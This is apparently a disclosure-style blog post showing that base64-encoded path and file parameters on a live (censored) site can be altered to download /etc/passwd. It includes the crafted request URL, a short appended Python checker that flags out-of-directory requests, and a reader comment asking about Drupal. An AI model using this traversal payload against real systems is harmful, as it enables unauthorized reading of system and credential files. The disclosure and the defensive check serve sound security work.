While browsing I found this cool remote file download vulnerability. :)
http://www.censored.or.id/index.php?m=default&s=download&path=c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==&file=cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA==&hs=true
If I open the link above, it downloads a file for me. Now look at the path and file parameters. They are base64 encoded.
path=c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==
file=cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA==
Decoding both values, I got this:
path=system/modules/berita/files/download/
file=presentation_final.ppt
Now I know the path and the file name. What if I change them? Let's see.
path=L2V0Yy8=
file=cGFzc3dk
I changed the path value to /etc/ and the file value to passwd, base64-encoding both first.
http://www.censored.or.id/index.php?m=default&s=download&path=L2V0Yy8=&file=cGFzc3dk&hs=true
This modified link downloads the passwd file from the system.
That's it.. :)
*Some links and values in this PoC have been censored/changed because this is a live website.
*The admin has been notified by email.
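A defensive check for the pattern shown above, as an added example that is not code from the original post or from the affected site: it decodes the base64 path and file parameters of a request URL and reports whether the resulting target stays inside the intended download directory. DOWNLOAD_ROOT and the function names are assumptions; the sample URLs are the two quoted in the post.

```python
import base64
import binascii
import posixpath
from urllib.parse import parse_qs, urlsplit

# Assumption: the only directory the download handler is meant to serve from.
DOWNLOAD_ROOT = "system/modules/berita/files/download"


def b64_param(query, name):
    """Decode one base64 query parameter; None if missing or not valid base64/UTF-8."""
    values = query.get(name)
    if not values:
        return None
    raw = values[0].replace(" ", "+")  # parse_qs turns an unescaped '+' into a space
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def inspect_download(url, root=DOWNLOAD_ROOT):
    """Return (target, allowed): the decoded file target and whether it stays under root."""
    query = parse_qs(urlsplit(url).query)
    path, name = b64_param(query, "path"), b64_param(query, "file")
    if path is None or name is None:
        return None, False
    # Lexical normalisation collapses "../" segments. A server-side handler
    # should additionally resolve symlinks (os.path.realpath) before opening.
    target = posixpath.normpath(posixpath.join(path, name))
    allowed = not posixpath.isabs(target) and target.startswith(root + "/")
    return target, allowed


if __name__ == "__main__":
    base = "http://www.censored.or.id/index.php?m=default&s=download"
    samples = [  # the two requests quoted in the post
        base + "&path=c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==&file=cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA==&hs=true",
        base + "&path=L2V0Yy8=&file=cGFzc3dk&hs=true",
    ]
    for url in samples:
        target, allowed = inspect_download(url)
        print("ALLOW" if allowed else "DENY ", target)
```

The same function can be run over logged request URLs to flag download requests whose decoded target falls outside the download directory.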
Comments
I want to ask you a question: is it possible to use that on Drupal?